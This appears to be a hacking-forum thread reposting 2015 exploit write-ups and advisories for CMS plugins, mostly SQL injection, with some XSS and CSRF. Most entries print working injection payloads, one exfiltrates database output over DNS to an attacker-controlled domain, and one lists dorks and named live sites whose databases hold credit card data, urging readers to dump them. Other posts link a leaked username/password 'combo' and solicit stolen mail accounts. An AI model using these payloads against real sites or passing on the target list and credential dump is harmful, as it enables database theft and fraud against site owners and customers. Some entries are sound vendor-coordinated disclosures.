  13. ################################################################################################## #Exploit Title : Wordpress Plugin 'Business Intelligence' Remote SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : https://www.wpbusinessintelligence.com #Download Link : https://downloads.wordpress.org/plugin/wp-business-intelligence-lite.1.6.1.zip #Date : 1/04/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// Wordpress plugin "Business Intelligence" is not filtering data in GET parameter ' t ', which in is file 'view.php' and passing user supplied data to SQL queries' hence SQL injection vulnerability has taken place. /////////////////////////////// // Vulnerability Description: / /////////////////////////////// vulnerability is due to parameter " t " in file 'view.php'. user can inject sql query uning GET parameter 't' //////////////// /// POC //// /////////////// POC Image URL---> ================= Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in parameter 't' (file 'view.php'): ================================================= Injectable Link---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php?t=1 Union based SQL injection exist in the parameter which can be exploited as follows: Payload used in Exploitation for Database name ---> http://www.wpbusinessintelligence.com/wp-content/plugins/wp-business-intelligence/view.php ?t=1337+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10,11+from+information_schema.tables+where+table_schema=database()--+ ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://packetstorm.wowhacker.com/1504-exploits/wpbusinessintelligence-sql.txt
  14. [+]Title: Joomla Contact Form Maker v1.0.1 Component - SQL injection vulnerability [+]Author: TUNISIAN CYBER [+]Date: 29/03/2015 [+]Vendor: http://extensions.joomla.org/extensions/extension/contacts-and-feedback/contact-forms/contact-form-maker [+]Type:WebApp [+]Risk:High [+]Overview: Contact Form Maker v1.0.1 suffers, from an SQL injection vulnerability. [+]Proof Of Concept: 127.0.0.1/index.php?option=com_contactformmaker&view=contactformmaker&id=SQL Source
  15. Sql user_pass private combo https://mega.co.nz/#!29RV1CDS!jLiG5G7SFAb9yjXaOglRa3IYPLfV8fosRP6UWsfWwc8
  16. ################################################################################################## #Exploit Title : Joomla Spider Random Article Component SQL Injection vulnerability #Author : Jagriti Sahu AKA Incredible #Vendor Link : Joomla Random Article Demo-Web Dorado #Date : 22/03/2015 #Discovered at : IndiShell Lab #Love to : error1046 ,Team IndiShell,Codebreaker ICA ,Subhi,Mrudu,Hary,Kavi ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component "Spider Random Article" is not filtering data in catID and Itemid parameters and hence affected by SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to catID and Itemid parameter //////////////// /// POC //// /////////////// SQL Injection in catID parameter ================================= Use error based double query injection with catID parameter Injected Link---> Joomla Form Maker Demo-Web-Dorado Like error based double query injection for exploiting username ---> Error: 500 View not found [name, type, prefix]: randomarticle, html, randomarticleView' and(select 1 FROM(select count(*),concat((select (select concat(database(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- -&limit=1&style=1&view=articles&format=raw&Itemid=13 POC Image URL---> Image - TinyPic - Free Image Hosting, Photo Sharing & Video Hosting SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection Error: 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '***%' OR items='all'' at line 1 SQL=SELECT * FROM vmvxw_spiderfacebook_params WHERE items LIKE '%***13' extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e ))-- - POC Image URL---> http://tinypic.com/view.php?pic=1239z5h&s=8#.VRG97OESHIU ################################################################################################### --==[[special Thanks to]]==-- # Manish Kishan Tanwar # Source: http://dl.packetstormsecurity.net/1503-exploits/joomlasrac-sql.txt
  17. ################################################################################################## #Exploit Title : Joomla Spider FAQ component SQL Injection vulnerability #Author : Manish Kishan Tanwar AKA error1046 #Vendor Link : http://demo.web-dorado.com/spider-faq.html #Date : 21/03/2015 #Discovered at : IndiShell Lab #Love to : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,Incredible,Kishan Singh and ritu rathi #Discovered At : Indishell Lab ################################################################################################## //////////////////////// /// Overview: //////////////////////// joomla component Spider FAQ is not filtering data in theme and Itemid parameters and hence affected from SQL injection vulnerability /////////////////////////////// // Vulnerability Description: /////////////////////////////// vulnerability is due to theme and Itemid parameter //////////////// /// POC //// /////////////// POC image=http://oi57.tinypic.com/2rh1zk7.jpg SQL Injection in theme parameter ================================= Use error based double query injection with theme parameter Like error based double query injection for exploiting username ---> and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - Injected Link---> http://website.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4 and(select 1 FROM(select count(*),concat((select (select concat(user(),0x27,0x7e)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)-- - &searchform=1&expand=0&Itemid=109 SQL Injection in Itemid parameter ================================= Itemid Parameter is exploitable using xpath injection User extraction payload ------------------------ ' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - crafted URL---> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' AND EXTRACTVALUE(6678,CONCAT(0x7e,(SELECT user() LIMIT 0,1),0x7e))-- - Table extraction ----------------- ' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - Crafted URL----> http://demo.web-dorado.com/index.php?option=com_spiderfaq&view=spiderfaqmultiple&standcat=0&faq_cats=,2,3,&standcatids=&theme=4&searchform=1&expand=0&Itemid=109' and extractvalue(6678,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() LIMIT 0,1),0x7e))-- - --==[[ Greetz To ]]==-- ############################################################################################ #Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba, #Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad, #Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA, #Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Dash ############################################################################################# --==[[Love to]]==-- # My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi, #Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Jagriti,Salty and Don(Deepika kaushik) --==[[ Special Fuck goes to ]]==-- <3 suriya Cyber Tyson <3 Source
  18. pm me if u have canada mail,, thanks
  19. *Comsenz SupeSite 7.0 CMS SQL Injection Security Vulnerabilities* Exploit Title: Comsenz SupeSite CMS SQL Injection Security Vulnerabilities Product: SupeSite CMS (Content Management System) Vendor: Comsenz Vulnerable Versions: 6.0.1UC 7.0 Tested Version: 7.0 Advisory Publication: March 14, 2015 Latest Update: March 14, 2015 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection' [CWE-89] CVE Reference: * Impact CVSS Severity (version 2.0): CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend) Impact Subscore: 6.4 Exploitability Subscore: 10.0 Discover and Author: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore] *Suggestion Details:* *(1) Vendor & Product Description:* *Vendor: * Comsenz *Product & Version:* SupeSite6.0.1UC SupeSite7.0 *Vendor URL & Download:* SupeSite can be bought from here, http://www.comsenz.com/products/other/supesite http://www.comsenz.com/downloads/install/supesite#down_open *Source code:* http://www.8tiny.com/source/supesite/nav.html?index.html *Product Introduction:* "SupeSite is an independent content management (CMS) function, and integrates Web2.0 community personal portal system X-Space, has a strong aggregation of community portal systems. SupeSite station can be achieved within the forum (Discuz!), personal space (X-Space) information content aggregation. Any webmaster , are available through SupeSite, easy to build a community portal for Web2.0." "Through grade audit operations, audit managers can publish information on the station to rank classification, shield, remove the handle, which can display information on the effective control of the site's pages. When the audit information, the audit level is set to shield information, the information will no longer appear on the page aggregation site, but the user's own personal space is still displayed above. If you want to completely shield the information, use the delete function. Audit information is divided into five levels, you can page polymerization conditions, freedom of information conducted classification. The default user information released pending state audit level. Administrators can set up the site, set whether to allow the pending status of the information displayed on the site aggregation page." *(2) Vulnerability Details:* SupeSite web application has a security bug problem. It can be exploited by SQL Injection attacks. This may allow an attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data. Other Comsenz products vulnerabilities have been found by some other bug hunter researchers before. Comsenz has patched some of them. NVD is the U.S. government repository of standards based vulnerability management data (This data enables automation of vulnerability management, security measurement, and compliance (e.g. FISMA)). It has published suggestions, advisories, solutions related to similar vulnerabilities. *(2.1)* The code programming flaw occurs at "batch.common.php" page with "name" parameter. *References:* http://tetraph.com/security/sql-injection-vulnerability/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://securityrelated.blogspot.com/2015/03/comsenz-supesite-70-cms-sql-injection.html http://www.inzeed.com/kaleidoscope/computer-web-security/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ https://infoswift.wordpress.com/2015/03/14/comsenz-supesite-7-0-cms-sql-injection-security-vulnerabilities/ http://marc.info/?a=139222176300014&r=1&w=4 http://en.hackdig.com/?13972.htm -- Wang Jing, Division of Mathematical Sciences (MAS), School of Physical and Mathematical Sciences (SPMS), Nanyang Technological University (NTU), Singapore. http://www.tetraph.com/wangjing/ https://twitter.com/tetraphibious Source
  20. # Affected software: Mambo # Type of vulnerability: csrf to sql injection # URL: http://source.mambo-foundation.org/ # Discovered by: Provensec # Website: http://www.provensec.com #version 4.6.5 # Proof of concept no csrf token were used on sql query form so attacker can leverage csrf to execute sql query on admin end screenshot http://prntscr.com/6gk265 POST /mambo/administrator/index2.php HTTP/1.1 Host: demo.opensourcecms.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://demo.opensourcecms.com/mambo/administrator/index2.php Cookie: __utma=87180614.347131305.1423813196.1426315580.1426317582.5; __utmz=87180614.1424330089.2.2.utmcsr=4homepages.de|utmccn=(referral)|utmcmd=referral|utmcct=/demo/; __gads=ID=e4fef836c4eca064:T=1424329959:S=ALNI_MZOrjDhCaPQBQcowebgQWskHX12kQ; __utmc=87180614; 5503d94d48147_SESSION=ben7euhc7r3j578q73sbnn9oq4; __utmb=87180614.1.10.1426317586; __utmt=1; 25fee453fc1b1d324265b9cb23363e2c=san1g4th13mhokc4g5tk3muaa3; mostlyce[startup_key]=f1df635c5e35c15a244c554e356ad0e3; mostlyce[usertype]=Super+Administrator; webfxtab_modules-cpanel=4 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 47 sql=select&option=com_mostlydbadmin&task=xquery vulnerable paramter sql poc <html> <body> <form action=" http://demo.opensourcecms.com/mambo/administrator/index2.php" method="POST"> <input type="hidden" name="sql" value="sql statement to execute " /> <input type="hidden" name="option" value="com_mostlydbadmin" /> <input type="hidden" name="task" value="xquery" /> <input type="submit" value="Submit request" /> </form> </body> </html> Source
  21. OVERVIEW ========== WPML is the industry standard for creating multi-lingual WordPress sites. Three vulnerabilities were found in the plug-in. The most serious of them, an SQL injection problem, allows anyone to read the contents of the WordPress database, including user details and password hashes, without authentication. System administrators should update to version 3.1.9.1 released earlier this week to resolve the issues. DETAILS ======== 1. SQL injection When WPML processed a HTTP POST request containing the parameter ”action=wp-link-ajax”, the current language is determined by parsing the HTTP referer. The parsed language code is not checked for validity, nor SQL-escaped. The user doesn’t need to be logged in. By sending a carefully crafted referer value with the mentioned POST request parameter, an attacker can perform SQL queries on arbitrary tables and retrieve their results. In addition to the standard WordPress database and tables, the attacker may query all other databases and tables accessible to the web backend. The following HTML snippet demonstrates the vulnerability: <script> var union="select user_login,1,user_email,2,3,4,5,6,user_pass,7,8,9,10,11,12 from wp_users"; if (document.location.search.length < 2) document.location.search="lang=xx' UNION "+union+" -- -- "; </script> <form method=POST action="https://YOUR.WORDPRESS.BLOG/comments/feed"> <input type=hidden name=action value="wp-link-ajax"> <input type=submit> </form> The results of the SQL query will be shown in the comments feed XML-formatted. 2. Page/post/menu deletion WPML contains a ”menu sync” function which helps site administrators to keep WordPress menus consistent across different languages. This functionality lacked any access control, allowing anyone to delete practically all content of the website - posts, pages, and menus. Example: <form method=POST action="https://YOUR.WORDPRESS.BLOG/?page=sitepress-multilingual-cms/menu/menus-sync.php"> <input type=hidden name="action" value="icl_msync_confirm"> <input type=text name="sync" size=50 value="del[x][y][12345]=z"> <input type=submit> </form> Submitting the above form would delete the row with the ID 12345 in the wp_posts database. Several items be deleted with the same request. 3. Reflected XSS The ”reminder popup” code intended for administrators in WPML didn’t check for login status or nonce. An attacker can direct target users to an URL like: https://YOUR.WORDPRESS.BLOG/?icl_action=reminder_popup&target=javascript%3Aalert%28%2Fhello+world%2f%29%3b%2f%2f to execute JavaScript in their browser. This example bypasses the Chrome XSS Auditor. In the case of WordPress, XSS triggered by an administrator can lead to server-side compromise via the plugin and theme editors. CREDITS ======== The vulnerabilities were found by Jouko Pynnonen of Klikki Oy while researching WordPress plugins falling in the scope of the Facebook bug bounty program. The vendor was notified on March 02, 2015 and the patch was released on March 10. Vendor advisory: http://wpml.org/2015/03/wpml-security-update-bug-and-fix/ An up-to-date version of this document can be found on our website http://klikki.fi . -- Jouko Pynnönen <jouko@iki.fi> Klikki Oy - http://klikki.fi Source
  22. Advisory ID: HTB23250 Product: Huge IT Slider WordPress Plugin Vendor: Huge-IT Vulnerable Version(s): 2.6.8 and probably prior Tested Version: 2.6.8 Advisory Publication: February 19, 2015 [without technical details] Vendor Notification: February 19, 2015 Vendor Patch: March 11, 2015 Public Disclosure: March 12, 2015 Vulnerability Type: SQL Injection [CWE-89] CVE Reference: CVE-2015-2062 Risk Level: Medium CVSSv2 Base Score: 6 (AV:N/AC:M/Au:S/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ ) ----------------------------------------------------------------------------------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered an SQL injection vulnerability in Huge IT Slider WordPress Plugin. This vulnerability can be exploited by website administrators as well as anonymous attackers to inject and execute arbitrary SQL queries within the application’s database. 1) SQL injection in Huge IT Slider WordPress plugin: CVE-2015-2062 The vulnerability exists due to insufficient filtration of input data passed via the "removeslide" HTTP GET parameter to "/wp-admin/admin.php" script when "task" parameter is set to "popup_posts" or "edit_cat". A remote authenticated attacker with administrative privileges can execute arbitrary SQL queries within the application’s database. Below are two simple exploit codes that are based on DNS Exfiltration technique. They can be used if the database of the vulnerable application is hosted on a Windows system. The codes will send a DNS request requesting IP address for `version()` (or any other sensitive output from the database) subdomain of ".attacker.com" (a domain name, DNS server of which is controlled by the attacker). 1. Exploit example for "task=popup_posts": http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- 2. Exploit example for "task=edit_cat": http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=edit_cat&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) -- This vulnerability can be also exploited remotely by non-authenticated attackers using CSRF vector, since the web application is also prone to Cross-Site Request Forgery attacks. The attacker could use the following exploit code against authenticated website administrator to determine version of installed MySQL server: <img src="http://[host]/wp-admin/admin.php?page=sliders_huge_it_slider&task=popup_posts&id=1&removeslide=(select load_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(116),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR(99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CHAR(97),CHAR(114)))) --"> ----------------------------------------------------------------------------------------------- Solution: Update to Huge IT Slider 2.7.0 More Information: https://wordpress.org/support/topic/huge-it-slider-security-vulnerability-notification-sql-injection ----------------------------------------------------------------------------------------------- References: [1] High-Tech Bridge Advisory HTB23250 - https://www.htbridge.com/advisory/HTB23250 - SQL Injection in Huge IT Slider WordPress Plugin. [2] Huge IT Slider WordPress Plugin - http://huge-it.com/ - Huge IT slider is a convenient tool for organizing the images represented on your website into sliders. Each product on the slider is assigned with a relevant slider, which makes it easier for the customers to search and identify the needed images within the slider. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types. [5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model. ----------------------------------------------------------------------------------------------- Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References. Source
  23. ========================================================================================== Instant v2.0 SQL Injection Vulnerability ========================================================================================== :-------------------------------------------------------------------------------------------------------------------------: : # Exploit Title : Instant v2.0 SQL Injection Vulnerability : # Date : 10th March 2015 : # Author : X-Cisadane : # CMS Name : Instant v2.0 (another OverCoffee production) : # CMS Developer : overcoffee.com : # Version : 2.0 : # Category : Web Applications : # Vulnerability : SQL Injection : # Tested On : Google Chrome Version 40.0.2214.115 m (Windows 7), Havij 1.16 Pro & SQLMap 1.0-dev-nongit-20150125 : # Greetz to : Explore Crew, CodeNesia, Bogor Hackers Community, Ngobas and Winda Utari :-------------------------------------------------------------------------------------------------------------------------: A SQL Injection Vulnerability has been discovered in the Instant v.2.0 CMS. The Vulnerability is located in the subid Value of the product_cat.php File. Attackers are able to execute own SQL commands by usage of a GET Method Request with manipulated subid Value. Attackers are able to read Database information by execution of own SQL commands. DORKS (How to find the target) : ================================ "Powered By Instant" inurl:/catalog/ inurl:/product_cat.php?subid= Or use your own Google Dorks Proof of Concept ================ SQL Injection PoC : http://[Site]/[Path]/product_cat.php/subid=['SQLi] And you have to change the URL structure to http://[Site]/[Path]/product_cat.php?subid=['SQLi] Example : http://www.cynthiawebbdesigns.com/catalog/product_cat.php/subid=16617/index.html?PHPSESSID=3ef7e156add41316201ffe87bd489a7d Just change the URL structure to http://www.cynthiawebbdesigns.com/catalog/product_cat.php?subid='16617 And you'll see this error notice : You have an error in your SQL syntax; check the manual that corresponds to your MySQL ... Note : This CMS stored Credit Card Infos on the Database, just open your Fav Tool and Dump the orders Table PIC / PoC : http://i59.tinypic.com/4l0poh.png Another Vuln Sites : http://www.unitymarketingonline.com/catalog/product_cat.php?subid=['SQLi] http://www.peacefulinspirations.net/catalog/product_cat.php?subid=['SQLi] http://www.dickensgifts.com/catalog/product_cat.php?subid=['SQLi] http://www.frogandprincellc.com/catalog/product_cat.php?subid=['SQLi] http://www.debrekht.com/catalog/product_cat.php?subid=['SQLi] ... etc ... Source
  24. Document Title: =============== Data Source: Scopus CMS - SQL Injection Web Vulnerability References (Source): ==================== http://www.vulnerability-lab.com/get_content.php?id=1436 Release Date: ============= 2015-02-25 Vulnerability Laboratory ID (VL-ID): ==================================== 1436 Common Vulnerability Scoring System: ==================================== 8.9 Abstract Advisory Information: ============================== An independent security team of the vulnerability laboratory discovered a critical sql injection web vulnerability in the official Data Source Scopus Content Management System. Vulnerability Disclosure Timeline: ================================== 2015-02-25: Public Disclosure (Vulnerability Laboratory) Discovery Status: ================= Published Exploitation Technique: ======================= Remote Severity Level: =============== Critical Technical Details & Description: ================================ A remote sql injection web vulnerability has been discovered in the official Data Source Scopus Content Management System. The vulnerability allows remote attacker to inject own sql commands to compromise the affected database management system. The vulnerability is located in the `w` value of the `countrysearch.php` file. Remote attackers are able to compromise the application & dbms by manipulation of the `w` value in the `countrysearch.php` file. The issue is a classic order by injection. The request method to inject own commands is GET and the issue is located on the applicaiton-side of the service. The security risk of the sql injection vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 8.9. Exploitation of the remote sql injection web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation of the remote sql injection results in dbms, web-server and web-application compromise. Request Method(s): [+] GET Vulnerable File(s): [+] countrysearch.php Vulnerable Parameter(s): [+] w Proof of Concept (PoC): ======================= The remote sql injection web vulnerability can be exploited by remote attackers without privileged application user account or user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue. PoC: Example http://[localhost]/[PATH]/[FILE].php?w=-[SQL INJECCTION VULNERABILITY]'-- PoC: Demonstration http://www.server.com/countrysearch.php?w=world%27-[SQL INJECCTION VULNERABILITY]'-- Dork(s): inurl:".php?w=" Solution - Fix & Patch: ======================= The vulnerability can be patched by usage of the preapred statement in connection with a secure encode/parse of the w value in the countrysearch.php file. Restrict the w value input and filter by disallowing input of special chars or negative values. Disable php script error(0);! Security Risk: ============== The security risk of the remote sql injection web vulnerability in the countrysearch.php file is estimated as critical. Credits & Authors: ================== [GuardIran Security Team] P0!s0nC0d3 - (http://www.guardiran.org) Disclaimer & Information: ========================= The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/ Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission. Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research@vulnerability-lab.com PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt Source
  25. Advisory: Multiple reflecting XSS-, SQLi and InformationDisclosure-vulnerabilities in Zeuscart v.4 Advisory ID: SROEADV-2015-12 Author: Steffen Rösemann Affected Software: Zeuscart v.4 Vendor URL: http://zeuscart.com/ Vendor Status: pending CVE-ID: will asked to be assigned after release on FullDisclosure via OSS-list Software used for research: Mac OS X 10.10, Firefox 35.0.1 ========================== Vulnerability Description: ========================== ECommerce-Shopping Cart Zeuscart v. 4 suffers from multiple XSS-, SQLi- and InformationDisclosure-vulnerabilities. ================== Technical Details: ================== ==== XSS === Reflecting XSS-vulnerabilities can be found in a common Zeuscart-installation in the following locations and could be exploited for example by crafting a link and make a registered user click on that link. The parameter "search", which is used in the index.php is vulnerable to XSS-attacks. Exploit-Example: http:// {TARGET}/index.php?do=search&search=%22%3E%3Cbody%20onload=eval%28alert%28document.cookie%29%29%20%3E%3C!-- By appending arbitrary HTML- and/or JavaScript-code to the parameter "schltr" which is as well used in index.php, an attacker could exploit this XSS-vulnerable parameter: Exploit-Example: http:// {TARGET}/index.php?do=brands&schltr=All%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E The third XSS-vulnerability can be found in the "brand"-parameter, which is again used in index.php. Exploit-Example: http:// {TARGET}/index.php?do=viewbrands&brand=Bata%3Cbody%20onload=eval%28alert%28String.fromCharCode%2888,83,83%29%29%29%20%3E ==== SQLi ==== The SQL injection-vulnerabilities can be found in the administrative backend of Zeuscart v. 4 and reside in the following locations in a common installation. By appending arbitrary SQL statements to the "id"-parameter, an attacker could exploit this SQL injection vulnerability: Exploit-Example: http:// {TARGET}/admin/?do=disporders&action=detail&id=1+and+1=2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,database%28%29,34,35,version%28%29,37,38+--+ Another SQL injection vulnerability can be found here and can be exploited by appending SQL statements to the vulnerable "cid"-parameter: Exploit-Example: http:// {TARGET}/admin/?do=editcurrency&cid=1+and+1=2+union+select+1,database%28%29,3,version%28%29,5+--+ The last SQL injection vulnerability I found can be found in the following location and can be exploited by appending SQL statements to the vulnerable "id" parameter: http:// {TARGET}/admin/?do=subadminmgt&action=edit&id=1+and+1=2+union+select+1,version%28%29,3,database%28%29,5+--+ ============== Information Disclosure ============== The administrative backend of Zeuscart v. 4 allows the admin to use a functionality, which displays the PHP-installation settings via phpinfo(): http://{TARGET}/admin/?do=getphpinfo Unfortunately, the PHP-script does not check, if an authorized admin executes this functionality: It is possible even for unregistered users to request the above link to see the informations, phpinfo() displays. That could expose sensitive informations to an attacker which could lead to further exploitation. ========= Solution: ========= Vendor has been notified. After releasing a patch, which seems not to correct the issues, the vendor decided not to respond anymore to figure out a solution together. Currently, there is no patch available to secure Zeuscart-installations. ==================== Disclosure Timeline: ==================== 21-Jan-2015 – found the vulnerabilities 21-Jan-2015 - informed the developers (see [3]) 21-Jan-2015 – release date of this security advisory [without technical details] 21-Jan-2015 – fork of the repository to keep the vulnerable version available for other researchers (see [5]) 22-Jan-2015 - vendor responded, provided detailed information 04-Feb-2015 - vendor patches Bin/Core/Assembler.php; vulnerabilities are still exploitable, which has been reported to the vendor (see [3]) 19-Feb-2015 - asked the vendor again, if he will patch these issues (see [3]); vendor did not respond 21-Feb-2015 - release date of this security advisory 21-Feb-2015 - send to FullDisclosure ======== Credits: ======== Vulnerabilities found and advisory written by Steffen Rösemann. =========== References: =========== [1] http://zeuscart.com/ [2] https://github.com/ZeusCart/zeuscart [3] https://github.com/ZeusCart/zeuscart/issues/28 [4] http://sroesemann.blogspot.de/2015/01/sroeadv-2015-12.html [5] https://github.com/sroesemann/zeuscart Source
×
×
  • Create New...